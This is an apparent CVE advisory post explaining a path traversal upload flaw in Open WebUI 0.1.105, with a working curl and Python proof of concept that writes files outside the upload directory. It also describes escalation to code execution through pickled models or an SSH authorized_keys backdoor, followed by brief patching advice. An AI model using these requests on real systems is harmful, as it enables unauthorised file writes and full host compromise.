Listen to this Post
How the mentioned CVE works:
The vulnerability exists in Open WebUI version 0.1.105.
The /rag/api/v1/doc API endpoint handles file uploads.
User attaches file via plus sign in message input box.
File name from multipart form data is taken directly.
No validation or sanitization of the filename occurs.
Application constructs file path by concatenating UPLOAD_DIR with filename.
Attacker can include path traversal sequences like ../.
This allows writing files outside the intended upload directory.
The vulnerable code snippet shows: file_path = f”{UPLOAD_DIR}/{filename}”.
Contents are read and written without checks.
Arbitrary file write leads to remote code execution.
Attackers can upload malicious pickled Python models.
Deserialization of pickled data executes arbitrary bytecode.
Alternatively, upload authorized_keys to enable SSH access.
The web server user permissions determine accessible locations.
PoC uses cURL with filename parameter containing ../../../../tmp/pwned.txt.
Successful write to /tmp directory confirms traversal.
This is a combination of CWE-22 and CWE-434.
No authentication bypass needed; any authenticated user can exploit.
The issue affects deployments on Debian GNU/Linux 12.
dailycve form:
Platform: Debian GNU/Linux 12
Version: 0.1.105
Vulnerability: Path Traversal Upload
Severity: Critical
date: 2024.03.12
Prediction: 2024 April 15
What Undercode Say:
Analytics:
PoC curl command
TARGET_URI='https://victim.com'
JWT='your_jwt_token_here'
curl -H "Authorization: Bearer $JWT" -F "file=@/tmp/evil.txt;filename=../../../../../../../../../../tmp/pwned.txt" "$TARGET_URI/rag/api/v1/doc"
Verify file write
ollama@webserver:~$ cat /tmp/pwned.txt
korelogic
Python exploit snippet
import requests
files = {'file': ('../../../../tmp/backdoor', b'malicious data')}
requests.post('https://victim.com/rag/api/v1/doc', headers={'Authorization': f'Bearer {JWT}'}, files=files)
Exploit:
Authenticate to Open WebUI. Send POST to /rag/api/v1/doc with file parameter containing ../ sequences. File written to filesystem outside uploads directory. Upload SSH authorized_keys or pickled Python model for RCE.
Protection from this CVE:
Sanitize filename by removing path traversal patterns. Use secure file path joining (e.g., os.path.basename). Store files with random names instead of user-supplied names. Run web server with least privilege filesystem permissions.
Impact:
Full filesystem write as web server user. Remote code execution via model deserialization. SSH backdoor installation. Complete compromise of the Open WebUI host.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
